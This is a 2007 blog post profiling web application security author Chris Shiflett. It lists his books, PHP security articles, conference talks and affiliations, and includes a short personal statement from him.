Time: Wed, April 18 @ 6:00pm
Place: The Faultline (Sunnyvale)
http://www.faultlinebrewing.com/
1235 Oakmead Parkway
Sunnyvale, California, 94086
Tel: 408/736-2739

See you all there!

Friday, April 06, 2007

Reflection on Chris Shiflett



This week on Reflection we have Chris Shiflett. He is one of the very few people who have been blogging on webappsec for a long time, and I am sure his blog is among the top 10 most visited blogs on web application security. His knowledge of web application security is tremendous, and his blog is a goldmine for people looking to learn and understand the various types of web application vulnerabilities and their solutions. He has spoken at numerous conferences, published several articles, and even written a few books.

Chris shares with us how he got started in the web application security field and how he got involved with the PHP Security Consortium. In his own words:

“I've been an avid web enthusiast since the early 90s, although the first couple of years were mostly spent exploring the technologies involved, particularly HTTP. Web application security is a natural extension of my ongoing desire to apply creativity to a solid fundamental understanding of technology. I started programming on a Commodore 64 in the early 80s, but it wasn't until the early 90s that I focused my attention on web technologies.

The PHP Security Consortium is a group of people whose focus is educating the PHP community about web application security. It began with a simple post on my blog in 2004 requesting assistance with some research I was conducting at the time. (I was researching worms that combine XSS and CSRF, an idea later brought to life by the Myspace worm.) To date, members of the PHP Security Consortium have written books and articles, spoken at industry-leading PHP and open source conferences, and collaborated on projects like the PHP Security Guide and PHPSecInfo. Very little of our work promotes the group itself, because our focus is helping people.

I'm an avid soccer fan. Living in New York provides me with the chance to play with skilled players from all over the world, so I spend almost every weekend in the park. My wife runs marathons and occasionally convinces me to run with her, but I prefer soccer. :-)”



Based out of Brooklyn, NY, USA, Chris is only 30 years old (I cannot believe so many leading people in the webappsec field are under 30, which is a very promising sign for the industry). Below are his contributions to the webappsec community.


Books:-

Essential PHP Security (O'Reilly, 2005)
http://phpsecurity.org/

HTTP Developer's Handbook (Sams, 2003)
http://shiflett.org/books

Contributions to other books

Programming PHP (O'Reilly 2006)
http://www.amazon.com/Programming-PHP-Rasmus-Lerdorf/dp/1565926102

PHP Cookbook (O'Reilly 2006)
http://www.oreilly.com/catalog/phpckbk2/

PHP in Action (Manning, 2007)
http://www.manning.com/reiersol/


Articles (WebAppSec only):-

Note: This is a subset of his articles, those that are at least tangentially related to web application security.

The articles without a link were published in PHP Architect magazine and are available only by subscription. The date is listed with each article, in case you want to look up that particular issue of the magazine. You can also find this information on his blog.

Security Corner: Security Testing - 19 Dec 2006

Security Corner: Cross-Domain Ajax - 16 Oct 2006

Security Corner: Understanding Superglobals - 25 Jul 2006

Security Corner: Character Encoding - 28 Feb 2006

Security Corner: Email Injection - 25 Jan 2006

Security Corner: Context - 22 Dec 2005

Security Corner: Cross-Site Scripting - 21 Nov 2005

Security Corner: HTTP Response Splitting - 25 Oct 2005

Security Corner: Code Audits - 21 Sep 2005

Security Corner: Theory - 18 Jul 2005

Security Corner: Persistent Logins - 25 May 2005

Security Corner: BBCode - 19 Apr 2005

Security Corner: Magic Quotes - 21 Mar 2005

Security Corner: PHP Security Consortium - 15 Feb 2005

Guru Speak: Storing Sessions in a Database
http://shiflett.org/articles/storing-sessions-in-a-database

Security Corner: Cross-Site Request Forgeries
http://shiflett.org/articles/cross-site-request-forgeries

Security Corner: Ideology
http://shiflett.org/articles/ideology

Guru Speak: How to Avoid "Page Has Expired" Warnings
http://shiflett.org/articles/how-to-avoid-page-has-expired-warnings

Security Corner: File Uploads
http://shiflett.org/articles/file-uploads

Security Corner: Secure Design
http://shiflett.org/articles/secure-design

Security Corner: Session Hijacking
http://shiflett.org/articles/session-hijacking

Security Corner: Form Spoofing
http://shiflett.org/articles/form-spoofing

Security Corner: Input Filtering
http://shiflett.org/articles/input-filtering

Security Corner: SQL Injection
http://shiflett.org/articles/sql-injection

Security Corner: Shared Hosting
http://shiflett.org/articles/shared-hosting

Security Corner: Session Fixation
http://shiflett.org/articles/session-fixation

The Truth about Sessions
http://shiflett.org/articles/the-truth-about-sessions

Foiling Cross-Site Attacks
http://shiflett.org/articles/foiling-cross-site-attacks

Passport Hacking Revisited
http://shiflett.org/articles/passport-hacking-revisited

Passport Hacking
http://shiflett.org/articles/passport-hacking


Lectures / Talks:-

References to almost all of the talks mentioned below can be found on Chris's blog. I tried to get the links, but every time I got sidetracked by something on his blog and eventually ran out of time. For the links, please check back again later, or you can search on his blog (http://shiflett.org).

PHP Under Attack - OSCON (10 Jul 2003)

PHP Attacks and Defense – ApacheCon (19 Nov 2003)

PHP Security - OSCON (26 Jul 2004)

Foiling Cross-Site Attacks - OSCON (29 Jul 2004)

Securing PHP Sessions - OSCON (30 Jul 2004)

PHP Session Security - phpworks (23 Sep 2004)

Testing PHP with Perl - New York PHP (26 Oct 2004)

PHP Security - ApacheCon (14 Nov 2004)

Testing PHP with Perl - ApacheCon (16 Nov 2004)

PHP Security - PHP Quebec (30 Mar 2005)

PHP Security Briefing - PHP Quebec (01 Apr 2005)

PHP Security Briefing - NOAA SecCon (04 May 2005)

PHP Security by Example - phptropics (13 May 2005)

PHP Security Audit HOWTO - PHP West (11 Jun 2005)

PHP Security - ApacheCon Europe (19 Jul 2005)

PHP Security Briefing - ApacheCon Europe (21 Jul 2005)

Testing PHP with Perl - ApacheCon Europe (22 Jul 2005)

PHP Security - OSCON (01 Aug 2005)

PHP Security Briefing - OSCON (03 Aug 2005)

PHP by Example - phpworks (14 Sep 2005)

PHP Security by Example - phpworks (15 Sep 2005)

PHP Security Audit HOWTO - New York PHP (27 Sep 2005)

PHP Security Audit HOWTO - Boston PHP (06 Oct 2005)

PHP Security - ZendCon (18 Oct 2005)

PHP Security Audit HOWTO - ZendCon (21 Oct 2005)

Power PHP Testing - ApacheCon (11 Dec 2005)

Agile PHP Testing - PHP Quebec (31 Mar 2006)

What's New in PHP 5 - LinuxWorld (25 Apr 2006)

PHP Security - LinuxWorld (25 Apr 2006)

PHP Security - phptek (27 Apr 2006)

Zend Framework - Boston PHP (04 May 2006)

Essential PHP Security - ApacheCon Europe (27 Jun 2006)

The Truth about XSS - ApacheCon Europe (28 Jun 2006)

Agile PHP Testing - ApacheCon Europe (29 Jun 2006)

Power PHP Testing - OSCON (24 Jul 2006)

Essential PHP Security - OSCON (25 Jul 2006)

The Truth about XSS - OSCON (26 Jul 2006)

PHP Security Testing - OSCON (27 Jul 2006)

The Truth about XSS - phpworks (13 Sep 2006)

Agile PHP Testing - phpworks (13 Sep 2006)

PHP Security Audit HOWTO - EuroOSCON (21 Sep 2006)

PHP Security Testing - DC PHP Con (19 Oct 2006)

The Truth about XSS - DC PHP Con (19 Oct 2006)

Essential PHP Security - ZendCon (30 Oct 2006)

Security 2.0 - Web Builder 2.0 (05 Dec 2006)

The Truth about Sessions - PHP Quebec (15 Mar 2007)


Memberships:-

PHP Security Consortium (Founder)
http://phpsec.org/

Open Web Application Security Project
http://owasp.org/

Web Application Security Consortium
http://webappsec.org/


Companies worked for:-

USPS, eDonkey, Brain Bulb, OmniTI


Company working for:-

OmniTI (Principal)
http://omniti.com/


Email:-

http://shiflett.org/contact


Blog:-

http://shiflett.org/


Websites:-

Personal -

http://shiflett.org/

Work -

Omni TI
http://omniti.com/

PHP Security Consortium
http://phpsec.org/

Essential PHP Security
http://phpsecurity.org/


Education:-

BS in Computer Science


If you haven’t been to his blog yet, I strongly recommend visiting it soon, as you will find a plethora of information on webappsec there. Every webappsec enthusiast should have it on their watchlist.

Last Week - Jeff Williams
Next Week - Ory Segal